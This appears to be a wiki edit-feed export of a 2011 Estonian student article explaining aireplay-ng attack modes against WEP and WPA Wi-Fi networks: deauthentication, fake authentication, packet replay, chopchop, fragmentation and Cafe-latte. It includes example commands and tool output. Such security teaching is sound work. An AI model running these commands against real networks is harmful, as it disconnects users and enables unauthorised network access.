NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32788</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32788"/>
		<updated>2011-05-24T18:44:34Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Open Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
